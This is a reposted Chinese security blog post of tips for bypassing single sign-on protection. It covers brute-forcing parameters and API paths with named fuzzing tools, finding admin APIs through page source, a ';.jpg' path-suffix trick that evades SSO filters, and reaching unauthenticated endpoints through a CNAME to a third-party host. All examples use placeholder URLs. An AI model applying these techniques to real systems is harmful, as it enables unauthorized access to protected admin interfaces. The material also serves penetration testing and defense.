你所不知道的sso绕过tips

admin 2022年10月8日08:21:26评论143 views字数 1390阅读4分38秒阅读模式

你所不知道的sso绕过

sso bypass相关

通常所用的方法:

1.暴力破解

2.弱密码

3.apis目录暴力破解

暴力破解的思路

不要只寻找目录和文件,在每个有效的接口上找到可以暴力破解的参数

相关工具:

https://github.com/PortSwigger/param-miner

https://github.com/ffuf/ffuf

https://github.com/s0md3v/Arjun

Fuzzing

https://admin.org.com                    =====================>  ok

https://admin.org.com/blabla =====================> 404

https://admin.org.com/internal.php =====================> 301 Redirect

https://admin.org.com/internal.php?id=1 =====================> 200 ok

APIs

https://admin.org.com                   =====================>   200 OK then redirect to SSO

view-source:https://admin.org.com =====================> <script src=/admin.js></script> ===================> /api/admin/users

https://admin.org.com/api/admin/users =====================> 200 OK

鲜为人知的字典

https://gist.github.com/richard1230/8186e508163b7ed251345c9214433add

https://org.com/admin/$FUZZ$

鲜为人知的绕过技巧

https://org.com/admin/;.jpg 
https://org.com/admin/valid-file.jsp;.jpg



https://internal.org.com =====================> sso
https://internal.org.com/test.js =====================> sso
https://internal.org.com/test.jpg =====================> 404
https://internal.org.com/;.jpg =====================> 200 ok



https://internal.org.com =====================> sso
dig CNAME internal.org.com =====================> org.3rdparty.com
gau –subs 3rdparty.com =====================> hey.3rdparty.com/authentication/register
https://internal.org.com/authentication/register =====================> 200 ok



原文始发于微信公众号(迪哥讲事):你所不知道的sso绕过tips

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2022年10月8日08:21:26
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   你所不知道的sso绕过tipshttps://cn-sec.com/archives/1336168.html

发表评论

匿名网友 填写信息